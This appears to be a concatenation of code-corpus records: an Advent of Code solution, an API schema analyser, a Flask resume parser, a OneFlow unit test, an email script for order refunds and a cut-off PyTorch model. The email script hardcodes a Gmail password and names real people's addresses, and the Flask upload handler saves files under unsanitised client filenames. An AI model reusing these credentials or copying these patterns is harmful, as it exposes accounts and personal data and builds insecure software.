bottom = [x[:coord][::-1] for x in grid]\n top = [x[coord+1:] for x in grid]\n for i, x in enumerate(top):\n for j, (y1, y2) in enumerate(zip(x, bottom[i])):\n bottom[i][j] = y1 or y2\n return bottom\n\ndef iter_folds(grid, folds):\n for fold in folds:\n grid = fold_grid(grid, fold)\n yield grid\n\nii = iter_folds(grid, folds)\n\nprint(\"Q1:\", sum(sum(x) for x in next(ii)))\nfor i in ii:\n pass\ndisplay(i)\n\n\n\n","sub_path":"2021/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"150581613","text":"\"\"\"\nModul welches eine Methode bereit stellt mit der eine API auf ihre Keys untersucht werden kann.\n\"\"\"\nimport json\nimport xmltodict\nimport requests\nfrom visuanalytics.analytics.apis import api\n\nlist_limit = 10\ndatatype_converter = {\n \"int\": \"Zahl\",\n \"float\": \"Gleitkommazahl\",\n \"str\": \"Text\",\n \"bool\": \"Wahrheitswert\",\n \"nonetype\": \"Ohne Wert\",\n \"dict\": \"JSON\",\n \"list\": \"Liste\"\n}\n\n\ndef check_api(req_data):\n \"\"\"\n Führt eine Request an eine API aus, und abstrahiert im Anschluss die Response für die Datenselektierung im\n Frontend.\n\n :param req_data: Enthält Informationen über das Request-Objekt\n :type req_data: dict\n :return: Abstrahierte Version der Response oder Fehlermeldung und einen Boolean mit einer Aussage über den Erfolg der Funktion\n \"\"\"\n req = requests.Request(req_data[\"method\"], req_data[\"url\"], headers=req_data[\"headers\"],\n json=req_data.get(\"json\", None), data=req_data.get(\"other\", None), params=req_data[\"params\"])\n # Make the http request\n s = requests.session()\n response = s.send(req.prepare())\n\n try:\n list_keys = [\n \"same_type\",\n \"length\",\n \"object\"\n ]\n if req_data[\"response_type\"] == \"xml\":\n content = get_content(json.loads(json.dumps(xmltodict.parse(response.content), indent=4)))\n if \"error\" in content:\n return {\n \"err_msg\": \"An error occurred while loading the api-data\"\n }, False\n if list_keys == list(filter(lambda x: x in list_keys, content.keys())):\n content = {\n \"$toplevel_array$\": content\n }\n return content, True\n elif req_data[\"response_type\"] == \"json\":\n content = get_content(response.json())\n if \"error\" in content:\n return {\n \"err_msg\": \"An error occurred while loading the api-data\"\n }, False\n if list_keys == list(filter(lambda x: x in list_keys, content.keys())):\n content = {\n \"$toplevel_array$\": content\n }\n return content, True\n else:\n return {\n \"err_msg\": f\"Content-Type {req_data['repsonse_type']} of api-request not supported\"\n }, False\n except Exception:\n return {\n \"err_msg\": \"An error occurred while loading the api-data\"\n }, False\n\n\ndef get_content(obj):\n \"\"\"\n Abstrahiert das übergebene Objekt je nach Typ (dict, list, str, int etc.)\n\n :param obj: Objekt, welches abstrahiert werden soll\n :return: Beschreibung des Datentyps eines Objektes\n \"\"\"\n if type(obj) == list:\n if len(obj) == 0:\n return {\n \"same_type\": True,\n \"length\" : len(obj),\n \"object\" : None\n }\n elif same_datatypes(obj):\n obj_type = type(obj[0]).__name__.lower()\n if obj_type == \"list\" or obj_type == \"dict\":\n return {\n \"same_type\": True,\n \"length\" : len(obj),\n \"object\" : get_content(obj[0])\n }\n else:\n return {\n \"same_type\": True,\n \"length\" : len(obj),\n \"type\" : get_content(obj[0])\n }\n else:\n result = {\n \"same_type\": False,\n \"length\" : len(obj),\n \"type\" : list(map(lambda x: datatype_converter[type(x).__name__.lower()], obj[:list_limit]))\n }\n if len(obj) > list_limit:\n result.update({\"max_elements\": list_limit})\n return result\n elif type(obj) == dict:\n return dict(zip(obj.keys(), [get_content(obj[key]) for key in obj.keys()]))\n else:\n return datatype_converter[type(obj).__name__.lower()] # obj\n\n\ndef same_datatypes(lst):\n \"\"\"\n Überprüft für eine Liste, ob sie nur Daten vom selben Typ enthält. Dabei spielen Keys, Länge der Objekte etc. eine Rolle\n\n :param lst: Liste, die überprüft werden soll\n :type lst: list\n :return: Boolean, je nach Ausgang der Überprüfung\n \"\"\"\n datatype = type(lst[0]).__name__\n for item in lst:\n if type(item).__name__ != datatype: # return False, wenn die Liste verschiedene Datentypen enthält\n return False\n # Datentypen sind gleich, aber sind deren Strukturen auch gleich? (für komplexe Datentypen)\n if datatype == \"dict\":\n keys = lst[0].keys()\n for item in lst:\n if item.keys() != keys: # return False, wenn die Keys der Dictionaries verschieden sind\n return False\n elif datatype == \"list\":\n if sum([len(x) for x in lst]) / len(lst) != len(lst[0]): # return False, falls die Listen in der Liste verschiedene Längen haben\n return False\n datatypes = list(map(lambda x: type(x).__name__, lst[0]))\n for item in lst:\n if list(map(lambda x: type(x).__name__, item)) != datatypes: # return False, falls die Elemente der inneren Listen verschiedene Datenytpen haben\n return False\n\n return True\n","sub_path":"src/visuanalytics/analytics/apis/checkapi.py","file_name":"checkapi.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"451186691","text":"from flask import * \r\nfrom app import *\r\napp = Flask(__name__) \r\nimport final\r\nimport font_name\r\nimport os\r\nfrom werkzeug.utils import secure_filename\r\nimport glob\r\nimport csv \r\n\r\n#Loading Homepage \r\n@app.route('/')\r\n@app.route('/upload') \r\ndef upload(): \r\n return render_template(\"upload.html\") \r\n\r\n#Uploade File\r\n@app.route('/success', methods = ['GET','POST']) \r\ndef success():\r\n if request.method =='POST':\r\n f=request.files['file']\r\n file = str(f.filename)\r\n f.save(f.filename)\r\n #org_file[0] == pdf file and [1] == docx file\r\n org_file = final.file_convert(file)\r\n person_info = final.person_details(org_file[0])\r\n linkin_id = final.linkin(org_file[1])\r\n no_of_lines = final.no_lines(org_file[0])\r\n no_of_char = final.no_char(org_file[0])\r\n font_names = font_name.fontname(org_file[0])\r\n fontsize = final.font_size(org_file[1])\r\n total_table = final.count_tables(org_file[1])\r\n total_img = final.count_img(org_file[0])\r\n no_of_lines = ' , '.join([str(elem) for elem in no_of_lines])\r\n no_of_char = ' , '.join([str(elem) for elem in no_of_char])\r\n font_names = ' , '.join([str(elem) for elem in font_names])\r\n fontsize = ' , '.join([str(elem) for elem in fontsize])\r\n for fi in glob.glob(\"*.pdf\"):\r\n if(fi != org_file[0]):\r\n os.remove(fi)\r\n for fi in glob.glob(\"*.docx\"):\r\n if(fi != org_file[1]):\r\n os.remove(fi)\r\n return render_template(\"result.html\",name=person_info['name'],mob=person_info['mobile_number'],\r\n mail=person_info['email'],linkin=linkin_id,pages=person_info['no_of_pages'],\r\n lines=no_of_lines,char=no_of_char,font=font_names,f_size=fontsize,table=total_table,\r\n image=total_img)\r\n\r\n#Running Homefile\r\nif __name__ == '__main__':\r\n app.run(debug = True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"70078733","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport unittest\nfrom collections import OrderedDict\n\nimport numpy as np\nfrom test_util import GenArgList, type_name_to_flow_type, type_name_to_np_type\n\nimport oneflow.compatible.single_client.unittest\nfrom oneflow.compatible import single_client as flow\nfrom oneflow.compatible.single_client import typing as tp\n\n\ndef compare_with_numpy(device_type, device_num, in_shape, data_type, coeffs):\n assert device_type in [\"cpu\", \"gpu\"]\n assert data_type in [\"float32\", \"double\"]\n flow_data_type = type_name_to_flow_type[data_type]\n flow.clear_default_session()\n if device_type == \"cpu\":\n flow.config.cpu_device_num(device_num)\n else:\n flow.config.gpu_device_num(device_num)\n func_config = flow.FunctionConfig()\n func_config.default_data_type(flow_data_type)\n func_config.default_placement_scope(\n flow.scope.placement(device_type, \"0:0-{}\".format(device_num - 1))\n )\n func_config.default_logical_view(flow.scope.consistent_view())\n x = (np.random.random(in_shape) * 100).astype(type_name_to_np_type[data_type])\n\n def np_polyval_grad(coeffs, x):\n coeffs_len = len(coeffs)\n coeffs_diff = [(coeffs_len - i - 1) * coeffs[i] for i in range(coeffs_len - 1)]\n np_x_diff = np.polyval(coeffs_diff, x)\n return np_x_diff\n\n def assert_prediction_grad(blob: tp.Numpy):\n np_x_diff = np_polyval_grad(coeffs, x)\n assert np.allclose(blob, np_x_diff, rtol=1e-05, atol=1e-05)\n\n @flow.global_function(type=\"train\", function_config=func_config)\n def PolyValJob(x: tp.Numpy.Placeholder(shape=in_shape)):\n with flow.scope.placement(device_type, \"0:0\"):\n x += flow.get_variable(\n name=\"x\",\n shape=in_shape,\n dtype=flow_data_type,\n initializer=flow.zeros_initializer(),\n trainable=True,\n )\n flow.watch_diff(x, assert_prediction_grad)\n out = flow.math.polyval(coeffs, x)\n with flow.scope.placement(device_type, \"0:0\"):\n flow.optimizer.SGD(\n flow.optimizer.PiecewiseConstantScheduler([], [0.0001]), momentum=0\n ).minimize(out)\n return out\n\n of_out = PolyValJob(x).get().numpy()\n np_out = np.polyval(coeffs, x)\n assert np.allclose(of_out, np_out, rtol=1e-05, atol=1e-05)\n\n\ndef gen_arg_list(type):\n arg_dict = OrderedDict()\n if type == \"1n2d\":\n arg_dict[\"device_type\"] = [\"gpu\"]\n arg_dict[\"device_num\"] = [2]\n else:\n arg_dict[\"device_type\"] = [\"cpu\", \"gpu\"]\n arg_dict[\"device_num\"] = [1]\n arg_dict[\"in_shape\"] = [(2, 3)]\n arg_dict[\"data_type\"] = [\"float32\"]\n arg_dict[\"coeffs\"] = [[1.0, 2.0], [1.0, 2.0, 3.0]]\n return GenArgList(arg_dict)\n\n\n@flow.unittest.skip_unless_1n1d()\nclass TestPolyval1n1d(flow.unittest.TestCase):\n def test_polyval(test_case):\n for arg in gen_arg_list(\"1n1d\"):\n compare_with_numpy(*arg)\n\n\n@flow.unittest.skip_unless_1n2d()\nclass TestPolyval1n2d(flow.unittest.TestCase):\n def test_polyval(test_case):\n for arg in gen_arg_list(\"1n2d\"):\n compare_with_numpy(*arg)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"python/oneflow/compatible/single_client/test/ops/test_polyval.py","file_name":"test_polyval.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"427220460","text":"import os, shutil, csv\nfrom shadow_database import DatabaseConnection\nfrom shadow_helpers.helpers import set_in_dict\nimport smtplib\nimport time\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\ngmail_user = 'ftoyoda.mmello.ecom@gmail.com' \ngmail_password = '@Alterar123'\n\nserver = smtplib.SMTP_SSL('smtp.gmail.com', 465)\nserver.ehlo()\nserver.login(gmail_user, gmail_password)\n\ndef send_email(to, body,subject):\n\tsent_from = gmail_user \n\n\tmsg = MIMEMultipart()\n\tmsg['From'] = gmail_user\n\tmsg['To'] = to\n\tmsg['Subject'] = subject\n\tmsg.attach(MIMEText(body, 'html'))\n\n\ttry:\n\t\tserver.sendmail(gmail_user, to, msg.as_string())\n\t\tprint('Email sent! %s' % to)\n\texcept:\n\t\tprint('Something went wrong...')\n\nquery = \"\"\"\n\tSELECT distinct\n\t\tvoi.order_sequence, \n\t\tvoi.client_name, \n\t\tvoi.total_order_price,\n\t\ttid,\n\t\tpayment_method_group\n\tfrom bi_vtex_order_items voi\n\twhere voi.order_sequence in ('562345','560994','562457','561581','562575','561777','561144','561349','560945','560974','561882','562092','559499','559700','559951','560053','560253','560260','560354','560907','561966','562000','562162')\n\t\tand payment_method_group = 'creditCard' \n\t;\n\"\"\"\n\ndc = DatabaseConnection()\norders_to_cancel = dc.select(query, strip=True, dict_format=True)\n\nfor order in orders_to_cancel:\n\tsubject = 'Estorno de pedido do e-commerce.'\n\n\tbody = \"\"\"\n\t\t

Boa tarde, Talissa.

\n\t\t
\n\t\t

\n\t\t\tPor favor, estornar o pedido %(order_sequence)s.
\n\t\t\t
\n\t\t\tNome: %(client_name)s
\n\t\t\tValor pedido: %(total_order_price)s
\n\t\t\tValor estorno: %(total_order_price)s
\n\t\t\tTID: %(tid)s
\n\t\t

\n\t\t
\n\n\t\t

\n\t\t\tAtt,
\n\t\t\tFelipe Toyoda\n\t\t

\n\t\"\"\" % order\n\n\tsend_email('talissa.medina@marciamello.com.br', body, subject)\n\t# time.sleep(50)\n\nserver.close()\n","sub_path":"vtex_api/send_email_order_cancel.py","file_name":"send_email_order_cancel.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"457389093","text":"#!/usr/bin/env python\n\n# =============================================================================\n# nnAvicaching_find_weights.py\n# Author: Anmol Kabra -- github: @anmolkabra\n# Project: Solving the Avicaching Game Faster and Better (Summer 2017)\n# -----------------------------------------------------------------------------\n# Purpose of the Script:\n# Refer to the Report (link) for detailed explanation. In a gist, this script \n# learns the weights that highlight the change of eBird agents' behavior \n# after certain rewards are applied. The model uses a **3-layered** neural \n# network.\n# -----------------------------------------------------------------------------\n# Required Dependencies/Software:\n# - Python 2.x (obviously, Anaconda environment used originally)\n# - PyTorch\n# - NumPy\n# -----------------------------------------------------------------------------\n# Required Local Files/Data/Modules:\n# - ./data/*\n# - ./avicaching_data.py\n# =============================================================================\n\nfrom __future__ import print_function\nimport argparse\nimport time\nimport math\nimport os\nimport sys\nimport numpy as np\nimport matplotlib\ntry:\n os.environ[\"DISPLAY\"]\nexcept KeyError as e:\n # working without X/GUI environment\n matplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport avicaching_data as ad\n# import torch modules\nimport torch, torch.nn as nn\nimport torch.nn.functional as torchfun\nimport torch.optim as optim\nfrom torch.autograd import Variable\nmatplotlib.rcParams.update({'font.size': 14}) # font-size for plots\n\n# =============================================================================\n# training options\n# =============================================================================\nparser = argparse.ArgumentParser(description=\"NN Avicaching model for finding weights\")\n# training parameters\nparser.add_argument(\"--lr\", type=float, default=0.001, metavar=\"LR\",\n help=\"inputs learning rate of the network (default=0.001)\")\nparser.add_argument(\"--no-cuda\", action=\"store_true\", default=False,\n help=\"disables CUDA training\")\nparser.add_argument(\"--epochs\", type=int, default=10, metavar=\"E\",\n help=\"inputs the number of epochs to train for\")\n# data options\nparser.add_argument(\"--train-percent\", type=float, default=0.8, metavar=\"T\",\n help=\"breaks the data into T percent training and rest testing (default=0.8)\")\nparser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default=1)')\nparser.add_argument(\"--locations\", type=int, default=116, metavar=\"J\",\n help=\"inputs the number of locations (default=116)\")\nparser.add_argument(\"--time\", type=int, default=173, metavar=\"T\",\n help=\"inputs total time of data collection; number of weeks (default=173)\")\nparser.add_argument(\"--rand\", action=\"store_true\", default=False,\n help=\"uses random xyr data\")\n# plot/log options\nparser.add_argument(\"--no-plots\", action=\"store_true\", default=False,\n help=\"skips generating plot maps\")\nparser.add_argument(\"--hide-loss-plot\", action=\"store_true\", default=False,\n help=\"hides the loss plot, which is only saved\")\nparser.add_argument(\"--hide-map-plot\", action=\"store_true\", default=False,\n help=\"hides the map plot, which is only saved\")\nparser.add_argument(\"--log-interval\", type=int, default=1, metavar=\"I\",\n help=\"prints training information at I epoch intervals (default=1)\")\n# deprecated options -- not deleting if one chooses to use them\nparser.add_argument(\"--expand-R\", action=\"store_true\", default=False,\n help=\"[see script] expands the reward vectors into matrices with distributed rewards\")\nparser.add_argument(\"--eta\", type=float, default=10.0, metavar=\"F\",\n help=\"[see script] inputs parameter eta in the model (default=10.0)\")\nparser.add_argument(\"--lambda-L1\", type=float, default=10.0, metavar=\"LAM\",\n help=\"[see script] inputs the L1 regularizing coefficient\")\nparser.add_argument(\"--momentum\", type=float, default=1.0, metavar=\"M\",\n help=\"[see script] inputs SGD momentum (default=1.0)\") # if using SGD\n\nargs = parser.parse_args()\n# assigning cuda check and test check to single variables\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\nargs.should_test = (args.train_percent != 1.0)\n\n# set the seeds\ntorch.manual_seed(args.seed)\nnp.random.seed(seed=args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n# =============================================================================\n# constants and parameters\n# =============================================================================\n# global values and datasets\ntorchten = torch.FloatTensor # change here to use diff containers\nJ, T, numFeatures = args.locations, args.time, 0\ntrainX, trainY, trainR, testX, testY, testR, F_DIST = [], [], [], [], [], [], []\nu_train, u_test = np.array([]), np.array([])\n\nnum_train = int(math.floor(args.train_percent * T))\nnum_test = T - num_train\n\n# random datasets locations assigned to variables\nlocs_in_file = 232 # change this to use a diff random file\nrandXYR_file = \"./data/random/randXYR\" + str(locs_in_file) + \".txt\"\nrandXYR_weights_file = \"./data/random/randXYR\" + str(locs_in_file) + \"_weights.txt\"\nrandF_file = \"./data/random/randF\" + str(locs_in_file) + \".csv\"\nrandDIST_file = \"./data/random/randDIST\" + str(locs_in_file) + \".txt\"\n\n# =============================================================================\n# data input functions\n# =============================================================================\ndef read_set_data():\n \"\"\"\n Reads Datasets X, Y, R, f, D from the files using avicaching_data \n module's functions. f and D are then combined into F_DIST as preprocessed \n tensor. All datasets are normalized, expanded, averaged as required, \n leaving as torch tensors at the end of the function.\n \"\"\"\n global trainX, trainY, trainR, testX, testY, testR, F_DIST, numFeatures\n global u_train, u_test\n # shapes of datasets -- [] means expanded form:\n # - X, Y: T x J\n # - R: T x J [x 15]\n # - net.w1: J x numF x numF\n # - net.w2: J x numF x 1\n # - F_DIST: J x J x numF\n\n # read f and DIST datasets from file, operate on them\n if args.rand:\n F = ad.read_F_file(randF_file, J)\n DIST = ad.read_dist_file(randDIST_file, J)\n else:\n F = ad.read_F_file(\n \"./data/loc_feature_with_avicaching_combined.csv\", J)\n DIST = ad.read_dist_file(\n \"./data/site_distances_km_drastic_price_histlong_0327_0813_combined.txt\", \n J)\n F = ad.normalize(F, along_dim=0, using_max=True) # normalize using max\n DIST = ad.normalize(DIST, using_max=True) # normalize using max\n\n # process data for the NN\n numFeatures = len(F[0]) + 1 # compensating for the distance element\n F_DIST = torchten(ad.combine_DIST_F(F, DIST, J, numFeatures))\n numFeatures += 1 # for reward later\n\n # operate on XYR data\n X, Y, R = [], [], []\n if args.rand:\n if not os.path.isfile(randXYR_file):\n # file doesn't exists, make random data, write to file\n X, Y, R = make_rand_data()\n ad.save_rand_XYR(randXYR_file, X, Y, R, J, T)\n X, Y, R = ad.read_XYR_file(randXYR_file, J, T)\n else:\n X, Y, R = ad.read_XYR_file(\n \"./data/density_shift_histlong_as_previous_loc_classical_drastic_price_0327_0813.txt\", \n J, T)\n \n u = np.sum(Y, axis=1) # u weights for calculating losses\n\n # normalize X, Y using sum along rows\n X = ad.normalize(X, along_dim=1, using_max=False)\n Y = ad.normalize(Y, along_dim=1, using_max=False)\n if not args.expand_R:\n R = ad.normalize(R, along_dim=0, using_max=False)\n\n # split the XYR data\n if args.should_test:\n # training and testing, shuffle and split the data\n shuffle_order = np.random.permutation(T)\n trainX, testX = ad.split_along_dim(X[shuffle_order], num_train, dim=0)\n trainY, testY = ad.split_along_dim(Y[shuffle_order], num_train, dim=0)\n trainR, testR = ad.split_along_dim(R[shuffle_order], num_train, dim=0)\n u_train, u_test = ad.split_along_dim(u[shuffle_order], num_train, dim=0)\n else:\n # no testing, split the data -> test Matrices are empty\n trainX, testX = ad.split_along_dim(X, num_train, dim=0)\n trainY, testY = ad.split_along_dim(Y, num_train, dim=0)\n trainR, testR = ad.split_along_dim(R, num_train, dim=0)\n u_train, u_test = ad.split_along_dim(u, num_train, dim=0)\n\n # change the input data into pytorch tensors and variables\n trainR, testR = torchten(trainR), torchten(testR)\n u_train, u_test = torchten(u_train), torchten(u_test)\n trainX = Variable(torchten(trainX), requires_grad=False)\n trainY = Variable(torchten(trainY), requires_grad=False)\n testX = Variable(torchten(testX), requires_grad=False)\n testY = Variable(torchten(testY), requires_grad=False)\n\n if args.expand_R:\n # expand R (trainR and testR)\n trainR_ext = torchten(num_train, J, 15)\n testR_ext = torchten(num_test, J, 15)\n for t in xrange(num_train):\n trainR_ext[t] = expand_R(trainR[t], R_max=15)\n for t in xrange(num_test):\n testR_ext[t] = expand_R(testR[t], R_max=15)\n trainR, testR = trainR_ext, testR_ext\n numFeatures += 14 # 1 reward already added, adding the remaining 14\n\ndef make_rand_data(X_max=100.0, R_max=100.0):\n \"\"\"\n Creates random X and R and calculates Y based on random weights. Also \n stores the weights in files before returning.\n\n Args:\n X_max -- (float) Maximum value of element in X dataset (default=100.0)\n R_max -- (float) Maximum value of element in R dataset (default=100.0)\n\n Returns:\n 3-tuple -- (X, Y, R) (values are not de-normalized)\n \"\"\"\n global F_DIST\n # create random X and R and w\n origX = np.floor(np.random.rand(T, J) * X_max)\n origR = np.floor(np.random.rand(T, J) * R_max)\n X = ad.normalize(origX, along_dim=1, using_max=False)\n R = torchten(ad.normalize(origR, along_dim=0, using_max=False))\n w1 = Variable(torch.randn(J, numFeatures, numFeatures).type(torchten))\n w2 = Variable(torch.randn(J, numFeatures, 1).type(torchten))\n\n # convert to torch tensor and create placeholder for Y\n Y = np.empty([T, J])\n X = Variable(torchten(X), requires_grad=False)\n Y = Variable(torchten(Y), requires_grad=False)\n if args.cuda:\n # transfer to GPU\n X, Y, R, F_DIST = X.cuda(), Y.cuda(), R.cuda(), F_DIST.cuda()\n w1, w2 = w1.cuda(), w2.cuda()\n \n # build Y\n for t in xrange(T):\n # build the input by appending testR[t]\n inp = build_input(R[t])\n if args.cuda:\n inp = inp.cuda()\n inp = Variable(inp)\n \n # feed in data\n inp = torchfun.relu(torch.bmm(inp, w1)) # first weights\n inp = torch.bmm(inp, w2).view(-1, J) # second weights\n # add eta to inp[u][u]\n # eta_matrix = Variable(eta * torch.eye(J).type(torchten))\n # if args.cuda:\n # eta_matrix = eta_matrix.cuda()\n # inp += eta_matrix\n P = torchfun.softmax(inp).t()\n \n # calculate Y\n Y[t] = torch.mv(P, X[t])\n\n # for verification of random data, save weights ---------------------------\n w1_matrix = w1.data.cpu().numpy()\n w2_matrix = w2.data.view(-1, numFeatures).cpu().numpy()\n\n with open(randXYR_weights_file, \"w\") as f:\n # save w1\n f.write('# w1 shape: {0}\\n'.format(w1.data.shape))\n for data_slice in w1_matrix:\n f.write('# New slice\\n')\n np.savetxt(f, data_slice, fmt=\"%.15f\", delimiter=\" \")\n \n # save w2\n f.write('# w2 shape: {0}\\n'.format(w2.data.shape))\n np.savetxt(f, w2_matrix, fmt=\"%.15f\", delimiter=\" \")\n # -------------------------------------------------------------------------\n\n return (X.data.cpu().numpy(), Y.data.cpu().numpy(), R.cpu().numpy())\n\ndef test_given_data(X, Y, R, w1, w2, J, T, u):\n \"\"\"\n Tests a given set of datasets, printing the loss value after one \n forward propagation.\n\n Args:\n All arguments are self-explanatory\n \"\"\"\n # loss_normalizer divides the calculated loss after feed forward\n # formula = || ((u * (Y-mean(Y)))^2 ||\n loss_normalizer = (torch.mv(torch.t(Y \\\n - torch.mean(Y).expand_as(Y)).data, u)).pow(2).sum()\n loss = 0\n\n for t in xrange(T):\n # build the input by appending testR[t]\n inp = build_input(R[t])\n if args.cuda:\n inp = inp.cuda()\n inp = Variable(inp)\n \n # feed in data\n inp = torchfun.relu(torch.bmm(inp, w1)) # first weights\n inp = torch.bmm(inp, w2).view(-1, J) # second weights\n # add eta to inp[u][u]\n # eta_matrix = Variable(eta * torch.eye(J).type(torchten))\n # if args.cuda:\n # eta_matrix = eta_matrix.cuda()\n # inp += eta_matrix\n P = torchfun.softmax(inp).t()\n \n # calculate loss\n Pxt = torch.mv(P, X[t])\n loss += (u[t] * (Y[t] - Pxt)).pow(2).sum()\n # loss += args.lambda_L1 * torch.norm(net.w.data)\n loss /= loss_normalizer\n print(\"Loss = %f\\n\" % loss.data[0], end=\"\")\n\n# =============================================================================\n# IdProb3 class\n# =============================================================================\nclass IdProb3(nn.Module):\n \"\"\"\n An instance of this class emulates the model used for Identification \n Problem as a 3-layered network.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initializes IdProb3, creates the sets of weights for the model.\"\"\"\n super(IdProb3, self).__init__()\n self.w1 = nn.Parameter(torch.randn(J, numFeatures, numFeatures).type(\n torchten))\n self.w2 = nn.Parameter(torch.randn(J, numFeatures, 1).type(torchten))\n\n def forward(self, inp):\n \"\"\"\n Goes forward in the network -- multiply the weights, apply relu, \n multiply weights again and apply softmax\n\n Returns:\n torch.Tensor -- result after going forward in the network.\n \"\"\"\n inp = torchfun.relu(torch.bmm(inp, self.w1)) # first weights\n inp = torch.bmm(inp, self.w2).view(-1, J) # second weights\n\n # add eta to inp[u][u]\n # eta_matrix = Variable(eta * torch.eye(J).type(torchten))\n # if args.cuda:\n # \t eta_matrix = eta_matrix.cuda()\n # inp += eta_matrix\n return torchfun.softmax(inp)\n\n# =============================================================================\n# training and testing routines\n# =============================================================================\ndef train(net, optimizer, loss_normalizer, u):\n \"\"\"\n Trains the Neural Network using IdProb3 on the training set.\n\n Args:\n net -- (IdProb3 instance)\n optimizer -- (torch.optim instance) of the Gradient-Descent function\n loss_normalizer -- (Torch.Tensor) value to be divided from the loss\n u -- (Torch.Tensor) weights to be multiplied when calculating the loss \n function\n\n Returns:\n 3-tuple -- (Execution Time, End loss value, \n Model's prediction after feed forward [Px])\n \"\"\"\n loss, loop_time = 0, 0\n P_data = torch.zeros(num_train, J)\n\n for t in xrange(num_train):\n # build the input by appending trainR[t] to F_DIST\n inp = build_input(trainR[t])\n \n loop_start = time.time()\n if args.cuda:\n inp = inp.cuda()\n inp = Variable(inp)\n \n # feed in data\n P = net(inp).t() # P is now weighted -> softmax\n \n # calculate loss\n Pxt = torch.mv(P, trainX[t])\n P_data[t] = Pxt.data\n loss += (u[t] * (trainY[t] - Pxt)).pow(2).sum()\n \n loop_time += (time.time() - loop_start)\n\n # loss += args.lambda_L1 * torch.norm(net.w.data)\n start_outside = time.time()\n loss /= loss_normalizer\n\n # backpropagate\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n end_time = (time.time() - start_outside) + loop_time\n return (end_time, loss.data[0], \n torch.mean(P_data, dim=0).squeeze().cpu().numpy())\n\ndef test(net, loss_normalizer, u):\n \"\"\"\n Tests the Neural Network using IdProb3 on the test set.\n\n Args:\n net -- (IdProb3 instance)\n loss_normalizer -- (Torch.Tensor) value to be divided from the loss\n u -- (Torch.Tensor) weights to be multiplied when calculating the loss \n function\n\n Returns:\n 3-tuple -- (Execution Time, End loss value, \n Model's prediction after feed forward [Px])\n \"\"\"\n loss, loop_time = 0, 0\n P_data = torch.zeros(num_test, J)\n \n for t in xrange(num_test):\n # build the input by appending testR[t]\n inp = build_input(testR[t])\n \n loop_start = time.time()\n if args.cuda:\n inp = inp.cuda()\n inp = Variable(inp)\n \n # feed in data\n P = net(inp).t() # P is now weighted -> softmax\n \n # calculate loss\n Pxt = torch.mv(P, testX[t])\n P_data[t] = Pxt.data\n loss += (u[t] * (testY[t] - Pxt)).pow(2).sum()\n\n loop_time += (time.time() - loop_start)\n\n # loss += args.lambda_L1 * torch.norm(net.w.data)\n start_outside = time.time()\n loss /= loss_normalizer\n\n end_time = (time.time() - start_outside) + loop_time\n return (end_time, loss.data[0], \n torch.mean(P_data, dim=0).squeeze().cpu().numpy())\n\n# =============================================================================\n# utility functions for training and testing routines\n# =============================================================================\ndef build_input(rt):\n \"\"\"\n Builds and returns the input for the neural network. Joins F_DIST and R, \n expanding R to fit the dimension.\n\n Args:\n rt -- (Torch.Tensor) rewards vector to be appended to form the full \n dataset\n \n Returns:\n Torch.Tensor -- Input dataset for the neural network\n \"\"\"\n if args.expand_R:\n # supplied rt is a matrix\n return torch.cat([F_DIST, rt.repeat(J, 1, 1)], dim=2)\n # else supplied rt is a vector\n return torch.cat([F_DIST, rt.repeat(J, 1)], dim=2)\n\n# =============================================================================\n# logs and plots\n# =============================================================================\ndef save_plot(file_name, x, y, xlabel, ylabel, title):\n \"\"\"\n Saves and (optionally) shows the loss plot of train and test periods.\n\n Args:\n file_name -- (str) name of the file for saving\n x -- (NumPy ndarray) data on the x-axis\n y -- (3d array/tuple) data on the y-axis. y[0] should be \n train results, y[1] should be test results obtained from the \n functions. y[-][k] should be the results after the k+1 epoch \n such that y[-][k][0] is the execution time and y[-][k][1] is the \n end loss. See the main area of the script on how this is built.\n xlabel -- (str) label for the x-axis\n ylabel -- (str) what else can it mean?\n title -- (str) title of the plot\n \"\"\"\n # get the loss values from data\n train_losses = [i for j in y[0] for i in j][1::2]\n test_losses = [i for j in y[1] for i in j][1::2]\n \n # plot details\n loss_fig = plt.figure(1)\n train_label, = plt.plot(x, train_losses, \"r-\", label=\"Train Loss\") \n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.grid(True, which=\"major\", axis=\"both\", color=\"k\", ls=\"dotted\", lw=\"1.0\")\n plt.grid(True, which=\"minor\", axis=\"y\", color=\"k\", ls=\"dotted\", lw=\"0.5\")\n plt.minorticks_on()\n plt.title(title)\n\n # check if testing was enabled\n if args.should_test:\n test_label, = plt.plot(x, test_losses, \"b-\", label=\"Test Loss\")\n plt.legend(handles=[train_label, test_label])\n else:\n plt.legend(handles=[train_label])\n \n # save and show\n loss_fig.savefig(file_name, bbox_inches=\"tight\", dpi=200)\n if not args.hide_loss_plot:\n plt.show()\n plt.close()\n\ndef save_log(file_name, x, y, title):\n \"\"\"\n Saves the log of train and test periods to a 